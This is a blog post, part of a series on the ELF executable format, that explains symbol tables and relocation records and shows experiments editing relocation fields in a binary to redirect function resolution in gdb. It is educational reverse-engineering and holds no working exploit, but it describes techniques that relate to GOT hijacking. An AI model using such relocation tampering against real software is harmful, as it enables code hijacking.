<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdqtdcr2RrvanOjm_XGcKva6-EBGK5faMx1md4uABIRg5KTZOEA81NoAWDzWN-zV2_YQIYRShsegeGxMV33wmt3swloN2F6JEMdCnaFMZ-U67OXmkHnTMt5t1PRiYJiPvzvGxxWI0kAQ/s1600/interestingplts.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="830" data-original-width="1600" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdqtdcr2RrvanOjm_XGcKva6-EBGK5faMx1md4uABIRg5KTZOEA81NoAWDzWN-zV2_YQIYRShsegeGxMV33wmt3swloN2F6JEMdCnaFMZ-U67OXmkHnTMt5t1PRiYJiPvzvGxxWI0kAQ/s640/interestingplts.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The .fffff sections are from me doing research for this blog series but I freaked out a little when I saw them at first lol</span></i></td></tr>
</tbody></table>
<div>
Moving on, we should probably look at the struct the C runtime and glibc use to handle Relocation records:</div>
(extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28/elf/elf.h</span>)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcCRiafX58VXHKCvTLgT9a1zZHW16VmG5QouFHWnHdpZMQsU5DwEJIhY08uuw5sdCZy4x-um74eX_FjxYR1ZmjCCIH3ULLYUXoxN8JVwaNhWVKO90AixgCvW5MfAE6DP61isxfCWuYl1A/s1600/Screenshot+from+2018-10-14+13-31-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="654" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcCRiafX58VXHKCvTLgT9a1zZHW16VmG5QouFHWnHdpZMQsU5DwEJIhY08uuw5sdCZy4x-um74eX_FjxYR1ZmjCCIH3ULLYUXoxN8JVwaNhWVKO90AixgCvW5MfAE6DP61isxfCWuYl1A/s1600/Screenshot+from+2018-10-14+13-31-13.png" /></a></div>
<br />
<br />
This is what I've gathered each of the fields in the struct are meant for:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_Addr (8 bytes wide) r_offset</span> - the offset to the final function. this could hold a number of different kinds of address values or offsets that aid relocation resolution. <i>I expand on these a little later on this post, but to be fair to them please check out the documentation on this.</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_XWord (8 bytes wide) r_info </span>- a bit field the run time will pull through some macros to determine the kind of relocation being defined. The field holds typing information for the Reloc entry as well as the symbol index it is meant to refer to. <i>Quite crucial a field because if you can write to you can make relocs point to different symbols which is pretty powerful depending on context. </i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_SXWord r_addend (8 bytes wide) </span>- the addend, a parameter included in the calculation of the relocation - pretty much always ignored in the <span style="font-family: "courier new" , "courier" , monospace;">x86_64</span> format I'm using.<i> I will explore how true this claim is later on</i></li>
</ul>
<div>
To expand on how the <span style="font-family: "courier new" , "courier" , monospace;">r_info</span> field is used for determining type information for the reloc, here's an annotated screenshot:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCSNng5ZNhe5VUCxJjbRiOc3ZRX8ViRP4NUom3jjuOY6YfMwDE8l-SL6sQ69j7wL6mVs6ulC1En2NrL2sj7nGOGpKsJvPyBbS8TvottaR2LCA-p7FLyTCTbtUyyqGAWJmOmrGpARhst8/s1600/Rela_type_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCSNng5ZNhe5VUCxJjbRiOc3ZRX8ViRP4NUom3jjuOY6YfMwDE8l-SL6sQ69j7wL6mVs6ulC1En2NrL2sj7nGOGpKsJvPyBbS8TvottaR2LCA-p7FLyTCTbtUyyqGAWJmOmrGpARhst8/s1600/Rela_type_calc.png" /></a></div>
<br />
Nothing too fancy, the <span style="font-family: "courier new" , "courier" , monospace;">r_info</span> field (<i>as with many C-esque ELF Metadata <span style="font-family: "courier new" , "courier" , monospace;">*_info</span> field things)</i> is just a bit field that gets pulled through some shifting / anding operations to isolate the bits that are contingent on certain properties of the field.<br />
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_SYM</span> macro is actually for pulling out the symbol that this relocation applies to (<i>I hinted to that in the cheat sheet at the beginning of the section - because I got them foreshadowing skills yo</i>). Here's an example from a random binary I pulled of my machine (<i>notice that the Info field in the readelf dump and how it correlates with the symbol indexes</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOBEYbqSX5stwC5cScpsGtiYAizpEVrnVV5seyQXSEphZHXUym55-dZek2Uyeaz6Vzyrrk2AvM2dCXKgYfM1PcCQ5yzqHdHr4APNFiRERAXWCiFIUErVczHe_QH2vTNGsWpwd0XDvAjc/s1600/dynamic-relocsVSSymbolTable+%25283%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1013" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOBEYbqSX5stwC5cScpsGtiYAizpEVrnVV5seyQXSEphZHXUym55-dZek2Uyeaz6Vzyrrk2AvM2dCXKgYfM1PcCQ5yzqHdHr4APNFiRERAXWCiFIUErVczHe_QH2vTNGsWpwd0XDvAjc/s1600/dynamic-relocsVSSymbolTable+%25283%2529.png" /></a></div>
<br />
<br />
Some more insight on how this is probably meant to be used internally to the c runtime can be seen in an extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28_afl/glibc-2.28/elf/do-rel.h</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKUZRnuSnkHnqujhY1OXZDZaAKIKqbBjbvByxDOJtyo9Ssdm9rYh-KqAkxmeBituAiwV24Ueo9XTqg4hpjIZUvbRR66Tvwdj4sQkFJp415gvkABUFmW5Z15TJYOWWqw3FN2EY6s2gMeD8/s1600/glibc-ruseage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKUZRnuSnkHnqujhY1OXZDZaAKIKqbBjbvByxDOJtyo9Ssdm9rYh-KqAkxmeBituAiwV24Ueo9XTqg4hpjIZUvbRR66Tvwdj4sQkFJp415gvkABUFmW5Z15TJYOWWqw3FN2EY6s2gMeD8/s1600/glibc-ruseage.png" /></a></div>
<br />
<br />
<br />
We know what a C program will most likely use in terms of its own terminology but what does the format actually look like in raw hex?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVw6uLpgwixze4OhlofrKV2JYmav8ZxZ14i4jac79vxIIPjM7AjGeynx6AqCEfhPeEevJwxGvoZmGGeRH8Unb8BNMT4jcRxQ5UFxqgQRZ9DVxNWGXQP_az-tPw1UIYYjGATCaRTccHr5E/s1600/raw_reloc_section.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="948" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVw6uLpgwixze4OhlofrKV2JYmav8ZxZ14i4jac79vxIIPjM7AjGeynx6AqCEfhPeEevJwxGvoZmGGeRH8Unb8BNMT4jcRxQ5UFxqgQRZ9DVxNWGXQP_az-tPw1UIYYjGATCaRTccHr5E/s1600/raw_reloc_section.png" /></a></div>
<br />
<br />
One can see the extra NULL 8 bytes at the end, this is the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> set to 0 - <i>you will now know why readelf mentions the addend value but its almost always 0</i>.<br />
<br />
I mentioned that the <span style="font-family: "courier new" , "courier" , monospace;">[name] </span>part of the relocation .<span style="font-family: "courier new" , "courier" , monospace;">rel(a).[name]</span> mentioned the purpose of the field so I thought I could cook up an example of this in use. We can look at a large sample of the <span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_JUMP_SLOT</span> entries, I grabbed this from a random binary on my machine (<i>literally used a bash script that takes a list and passes it through shuf lol</i>):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhomWViuTcqZNuKtvhkB-_dxZL47E64haWjbLGkUlVjYjJaJxGNsh9roJWqJo_Ap_iR5-8CbXhhSMw0uOBAAzSNbbFSCpu-lNpAnucLYB655Vq5D1cYWjuK3v4m_ECBWwB_VoQbViUaaus/s1600/rela.plt+big+example+%25282%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="607" data-original-width="994" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhomWViuTcqZNuKtvhkB-_dxZL47E64haWjbLGkUlVjYjJaJxGNsh9roJWqJo_Ap_iR5-8CbXhhSMw0uOBAAzSNbbFSCpu-lNpAnucLYB655Vq5D1cYWjuK3v4m_ECBWwB_VoQbViUaaus/s1600/rela.plt+big+example+%25282%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i style="font-size: medium; text-align: left;">Color choice was on point with this one. </i></td></tr>
</tbody></table>
<br />
Clearly this section provides some insight on how the JUMP instructions that point to the GOT work. I believe that <span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_JUMP_SLOT</span> entries are specifically for preparing the PLT jump gadgets.<br />
<br />
Anyway all these beautiful fairy tales about Elfs make great bed time stories for unquestioning children; but lets see if the format is really treated this way. Next section looks at some of the horrible things that could happen when someone messes with the reloc metdata.<br />
<h2>
Relocation hex sorcery</h2>
</div>
<h3 style="text-align: left;">
</h3>
<div>
Lets see which evil spirits we can summon by flipping some bits in the reloc format for an Elf.<br />
<br />
<h3 style="text-align: left;">
r_info mangling</h3>
<br />
First off I lets see what happens when we change the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field up. Here I have two symbols that have reloc records in the <span style="font-family: "courier new" , "courier" , monospace;">.rela.plt</span> and I'm mangling the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field so they point to the same function, namely <span style="font-family: "courier new" , "courier" , monospace;">puts</span>; and then seeing what appens (<i>I'm changing the the byte in the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field that indicates the symbol pointed to by the reloc record</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqk_VzlhTUAShZQlHH1k3WVuXHJYAa23hnIzQyP-uiZ-bo58p8Cn9fP8CkN6JIeawbmOeHMew2wXgP37j7A8G8e7HigYljH8ZkMsIo1wkUCHD5rpDEs6_R8HDhluHSbTxX_YQ-xEv96t4/s1600/r_info_mangling_better+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1036" data-original-width="1600" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqk_VzlhTUAShZQlHH1k3WVuXHJYAa23hnIzQyP-uiZ-bo58p8Cn9fP8CkN6JIeawbmOeHMew2wXgP37j7A8G8e7HigYljH8ZkMsIo1wkUCHD5rpDEs6_R8HDhluHSbTxX_YQ-xEv96t4/s640/r_info_mangling_better+%25281%2529.png" width="640" /></a></div>
<br />
<br />
<br />
In the screen shot I'm trying to show what the picture was before and after editing the relocation metadata. We can see here that gdb actually feels the affect of the reloc because it used it on the symbol for <span style="font-family: "courier new" , "courier" , monospace;">putchar</span>.<br />
<br />
What happened here is when gdb tried to resolve the function it made use of the index value we changed. So we made the reloc point to a different index in the symbol table and it used this to resolve its definition resulting in the puts function being targeted instead.<br />
<br />
So we've learned that the <span style="font-family: "courier new" , "courier" , monospace;">r_info </span>field is pretty powerful when it comes to driving function identification in some contexts(2). Beyond that we can also look at how malformed <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> values affect execution.<br />
<br />
<h3>
r_offset mangling</h3>
Another thing I can show here is how repointing the <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span> value to the same function affects resolving GOT and PLT stuff. Because we are re-pointing a symbol relocation record here, it affects how the runtime recognizes that a symbol and as a result the runtime is invoked everytime we use a dynamic symbol in code. This is me editing the r_offset's for puts and putchar to point to the same value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuUO-4q0pOT1u1ccNnUmT3cknm-1raqNIxfP2Bm2Q17PZ1RGIbAi5NcLW4ASvWcfE-2kHMgayQru25FF1q5ZHijWP7GHn0vbME5EWC3UbRqf-0YEr6fl-zoinfOLycTKPZm9AY2EBjI4/s1600/injecting+r_offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="1008" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOuUO-4q0pOT1u1ccNnUmT3cknm-1raqNIxfP2Bm2Q17PZ1RGIbAi5NcLW4ASvWcfE-2kHMgayQru25FF1q5ZHijWP7GHn0vbME5EWC3UbRqf-0YEr6fl-zoinfOLycTKPZm9AY2EBjI4/s640/injecting+r_offset.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
And this is the result in gdb:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEZmkIwT07VnwBVqs4TeW25W0Cu58B8IooE-ihGcNrXRV7Gpx2N54Rar_nm3pw0hlBqlozj70Ekz6Z4EmQn6kQ4SJDrHhIzqhDICsMLjwWkG_SuvYHk1w8tsdBcq3lKtIVE0Ac52Id3FQ/s1600/r_info-change-in-gdb+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="449" data-original-width="955" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEZmkIwT07VnwBVqs4TeW25W0Cu58B8IooE-ihGcNrXRV7Gpx2N54Rar_nm3pw0hlBqlozj70Ekz6Z4EmQn6kQ4SJDrHhIzqhDICsMLjwWkG_SuvYHk1w8tsdBcq3lKtIVE0Ac52Id3FQ/s1600/r_info-change-in-gdb+%25281%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span id="goog_564296731"></span><span id="goog_564296732"></span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
On the right we have the binary that was edited, on the left we have the original. In this gdb session I set a breakpoint to the call in the PLT at <span style="font-family: "courier new" , "courier" , monospace;">0x400420</span> ; this invokes the <span style="font-family: "courier new" , "courier" , monospace;">__dl_runtime_resolve</span> which handles patching, and looking up symbols. As you can see, comparing both of them when we messed with the symbol <span style="font-family: "courier new" , "courier" , monospace;">r_offset</span>, it causes the <span style="font-family: "courier new" , "courier" , monospace;">dl_runtime</span> call to happen one more time than in the original.<br />
<br />
<h3>
r_type mangling</h3>
As for the r_type value (<i>which is defined as a certain bit offset in <span style="font-family: "courier new" , "courier" , monospace;">r_info</span></i>), I pretty much tried injecting others; but learned that the runtime has consistency checks on the types. There many other kinds of reloc sections that may allow for arbitrary <span style="font-family: "courier new" , "courier" , monospace;">r_types</span> and all kinds of symbol remapping. If they exist and when I find them I'll dedicate a blog post to them.<br />
<br />
For now lets look at how miserably I failed:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrq9A4ecSCEkMEXatkIq5yj7tjcaXOt0bepGV8EeaZzMJICID2t1Ym2lBZWF5yWe7LMNzLJDIVzx9fliqcepbiF2SQTLnNptVyHAzlkv_sXFkES_t6NYd8VLhQjA0BHNjZND4DEjP-pyQ/s1600/Screenshot+from+2018-10-18+20-24-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="726" data-original-width="1226" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrq9A4ecSCEkMEXatkIq5yj7tjcaXOt0bepGV8EeaZzMJICID2t1Ym2lBZWF5yWe7LMNzLJDIVzx9fliqcepbiF2SQTLnNptVyHAzlkv_sXFkES_t6NYd8VLhQjA0BHNjZND4DEjP-pyQ/s640/Screenshot+from+2018-10-18+20-24-57.png" width="640" /></a></div>
<br />
As you can see, whatever I try is outwardly rejected by the runtime, it won't have any of this nonsense lol. Anyway that's it for this one folks, stay tuned for the next post in this series covering some of the internals of dynamic linking and lazy loading ;).</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
<br />
<ol style="text-align: left;">
<li><a href="http://em386.blogspot.com/2006/10/resolving-elf-relocation-name-symbols.html">http://em386.blogspot.com/2006/10/resolving-elf-relocation-name-symbols.html</a></li>
<li><a href="http://bottomupcs.sourceforge.net/csbu/x3882.htm">http://bottomupcs.sourceforge.net/csbu/x3882.htm</a></li>
<li><a href="https://www.youtube.com/watch?v=kUk5pw4w0h4%C2%A0">https://www.youtube.com/watch?v=kUk5pw4w0h4 </a></li>
<li><a href="https://infosecwriters.com/text_resources/pdf/GOT_Hijack.pdf">https://infosecwriters.com/text_resources/pdf/GOT_Hijack.pdf</a></li>
<li><i>SecGOT: Secure Global Offset Tables in ELF Executables </i><a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1008.4167&rep=rep1&type=pdf">http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1008.4167&rep=rep1&type=pdf</a> </li>
<li><a href="https://stackoverflow.com/questions/41905762/why-does-the-linker-generate-seemingly-useless-relocations-in-rela-plt">https://stackoverflow.com/questions/41905762/why-does-the-linker-generate-seemingly-useless-relocations-in-rela-plt</a></li>
<li><a href="http://www.ucw.cz/~hubicka/papers/abi/node22.html">http://www.ucw.cz/~hubicka/papers/abi/node22.html</a> </li>
<li><a href="http://s.eresi-project.org/inc/articles/elf-rtld.txt">http://s.eresi-project.org/inc/articles/elf-rtld.txt</a></li>
</ol>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<div>
<h3 style="text-align: left;">
Footnotes:</h3>
<div>
<ol style="text-align: left;">
<li style="font-family: "times new roman";">To expand Lacan's quote here (<i>purely for the Elf Format Philosophiles</i>): Reality is never what we symbolize it to be, it is what always escapes our symbolization. What is left from our inevitable failure to completely symbolize it perfectly absolutely well with out mistakes exactly right clearly - you get it (<i>why are there so many perfected works for perfection itself</i>)? In this post I will essentially show in some ways that symbols can profoundly betray the functions/variables they are meant to point to: this is because even the symbols themselves, must have symbols that point their own meanings! So there seems to be a contingency on symbols having meaning but nothing that cements their right to point to anything as a specific meaning. They are free to point to any meaning or function (<i>he says as he repoints Lacan's philosophy at the Elf world</i>). But in the practical world in which we use them of course: they can, as an aggregated collection of symbols in some way expose a singular function; we can "recognize" that symbols in a certain category can be "summed up" or "replaced for" (<i>in a context-free grammatical sense</i>) more or less by a collective theme. Such themes are symbols too! But if under an already assumed theme, a collection of symbols misses consistency or paradoxes in a certain way with this theme (<i>which it will always inevitably do - because the hosting theme to every theme is reality itself - which always paradoxes</i>) the whole picture is broken; the theme becomes absurdity instead of what it originally hoped to be. In Lacan's case he argued that this is what in some sense defines our access to "the real" reality and that addressing this too directly caused a reflexive denial of how reality works (<i>we cannot accept the realism of complete non-fantasy or the extreme fantasy either</i>). In the case of linux executable formats it means we need to get some person to reverse engineer the whole binary to determine what functions do from the ground up - which is maddening in and of its own! lol </li>
<li style="font-family: "times new roman";"><span style="font-family: "times new roman";">This means there must be other things we can do with it, perhaps inject functions into the binary or re-point functions at a key time in their lazy loading life-cycle or force a re-invocation of the run-time in a way that side channels information about the functions being called and therefore data being processed? maybe maybe lol Probably better addressed in a separate post.</span></li>
</ol>
</div>
</div>
<div>
</div>
</div>
<div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-64127613923040499602018-10-10T20:09:00.000-07:002018-10-10T20:16:56.472-07:00Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1) <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>this</li>
</ol>
<br />
In this and the next post I'm going to explore how Elf files manage to pull off the magic of symbol resolution as well as the format, offsets and records in the Elf that represent this information. There are many facets to this mechanism in the format, and before I get into each of them I'd like to provide a gentle intro to frame your thinking around why things work the way they do.<br />
<br />
<h2 style="text-align: left;">
Introduction</h2>
<h3 style="text-align: left;">
<i>Symbolically locating the purpose of relocation</i></h3>
<i><br /></i>
<i>If you are already pretty clued up on why this important feel free to move onto the next section.</i><br />
<br />
I know you probably want to jump right in and look at all the awesome C definitions and byte offsets but I found that its much easier to understand how all these obscure offsets and hex values work if you know a little bit of the intention behind them and appreciate the real complexity of the problem being solved. So lets talk about why C programs need relocation and symbol tables.<br />
<br />
We know that code can become pretty big and to make things more refactor-able and reusable, we spit it up into smaller parts(1). There is a natural need that develops: to able to break code up into smaller sub-classes/files or general organizational units. In C/C++ this terminology is referred to as shared libraries and the Elf file format offers this functionality through Relocation, Symbols and Dynamic Linking. That is to say that the "things" being relocated, are symbol and symbols are for the most part variables and functions of different flavors.<br />
<br />
Suffice it to say "relocations" will be found in the Relocation Tables and the symbols these refer to will be found in the ELFs Symbol Tables - <i>I should mention also there is more than one symbol table and more than one relocation table, for nothing else than efficiency and extended capability in configuring symbol resolution</i>.<br />
<br />
<h3 style="text-align: left;">
<i>The object of compiling and linking objects</i></h3>
<div>
It also helps to picture what the compiler does to achieve a preparation of this information. Knowing what the final goal is helps us suffer through the annoying complex and obscure steps that aid towards it.<br />
<br />
When throwing together different shared libraries and object files, the linker decouples the actions of resolving symbols from linking the files together. So essentially there will be a first "sweep"(2) that slaps the different shared libraries and object files into a contiguous sequence.<br />
That action means in the final Elf object file, we are simply adding an offset to the original addresses of symbols that displaces them from where the originally appear in their own files.<br />
<br />
An even simpler way of thinking about it would be to say its basically like grabbing a bunch of arrays and sticking them inside another array to build an array of arrays (<i>which is a common action many languages</i>). I've depicted a minimal link and compile process with gcc commands included and even stuck in the real offsets some of the functions got mapped to:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4UdsvT6Il1qpx-LdgsDUPx-T-QB7twj73r7lhg3bR_s7h85mNhJoWbaLTmQNdGCP-kRKOT7yMiedTT0pf7IDpo0ZxInjpOyWouxpkfdSBZv7PcE71vUl5ITcQbDgPpIATt8CQLyuRhjI/s1600/linking+and+compiling+%25282%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="770" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4UdsvT6Il1qpx-LdgsDUPx-T-QB7twj73r7lhg3bR_s7h85mNhJoWbaLTmQNdGCP-kRKOT7yMiedTT0pf7IDpo0ZxInjpOyWouxpkfdSBZv7PcE71vUl5ITcQbDgPpIATt8CQLyuRhjI/s1600/linking+and+compiling+%25282%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>basic compile and link work flow with gcc. To get myself out of trouble I've included a relocate() fake function here to say "when this gets relocated it produces this address for the objects mapping in the final ELF file"</i></span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
So this is essentially the work flow of the compiler at a very high level, what should focus your investigation further would what those deeper details and hex obscurities are that achieve this aggregated behavior. <i>Why does this picture appear to work so smoothly? Well it must be hiding its hideous details away! </i><br />
<br /></div>
<div>
In closing, what you need to imagine here is that for each attribute there must be some bits and bytes that allow quick determination of the settings for each attribute as well as how it managed to end up in its place in the final Elf object file. In the next section we cover how this format works and what allows it to offer this amazing functionality <i>and we are going to show how horrible it can get when this breaks!</i></div>
<div>
<br /></div>
<b>Notes:</b><br />
<div>
<ol style="text-align: left;">
<li><i>This has nothing to do with development and more to do with the burden of processing language as a whole. </i></li>
<li><i>(borrowing some terms that foreshadow your journey into the world of compilers should you get crazy enough for that ride) </i></li>
</ol>
</div>
<h2 style="text-align: left;">
Symbol Table and friends (.symtab, .dynsym)</h2>
<div>
So the Elf format needs to find a clever compact way to bundle information so it represents the plethora of things that determine the type and scope/binding of a symbol and what must be done to resolve it as well. The symbol table is meant to show us the symbols we want to relocate.</div>
<div>
<br /></div>
<div>
I should mention that there are two symbol tables namely the main symbol table (<i><span style="font-family: "courier new" , "courier" , monospace;">.symtab</span> in the section headers</i>) and <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span> the dynamic symbol table, which is just a smaller subset of the entries in the main symbol table. This is a smaller copy relevant only to the dynamic linker. It follows exactly the same encoding and format as the main one,<i> but I won't discuss it here I'll give a full swing in a later post about dynamic linking instead.</i></div>
<div>
<br /></div>
<div>
Before we dig into things, here's a cheat sheet showing you the scope and break down of the Symbol Table:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltCGrtfMVCeTERCxDGTv7hB2SgjXoxjRNUcI0bf2Ob-XXJCpAX5r7Eff4BGfyqN752lkUvG6QmZOW2-6ISMhyphenhypheniwxKGA_8OOcU1jBQeCfUI5Hx9iLu0Fp_CG6q50IzQeA6jZGnJvTFD4Q/s1600/Symbol+Table+%25281%2529.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="884" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjltCGrtfMVCeTERCxDGTv7hB2SgjXoxjRNUcI0bf2Ob-XXJCpAX5r7Eff4BGfyqN752lkUvG6QmZOW2-6ISMhyphenhypheniwxKGA_8OOcU1jBQeCfUI5Hx9iLu0Fp_CG6q50IzQeA6jZGnJvTFD4Q/s1600/Symbol+Table+%25281%2529.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Symbol Table Entry Field Cheat Sheet</i></span></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
The following <span style="font-family: "courier new" , "courier" , monospace;">struct</span> is used in libelf, it should expose some important information about how Symbol Table Entries work (extract from <span style="font-family: "courier new" , "courier" , monospace;"><b>glibc/elf/elf.h:529-536</b></span>):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>typedef struct</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">{</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Word</b><span style="white-space: pre;"> </span>st_name; /* (4 bytes) Symbol name */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>unsigned char</b> st_info; /* (1 byte) Symbol type and binding */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>unsigned char</b> st_other; /* (1 byte) Symbol visibility */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Section</b> st_shndx; /* (2 bytes) Section index */</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> <b>Elf64_Addr</b><span style="white-space: pre;"> </span>st_value; /* (8 bytes) Symbol value */</span><br />
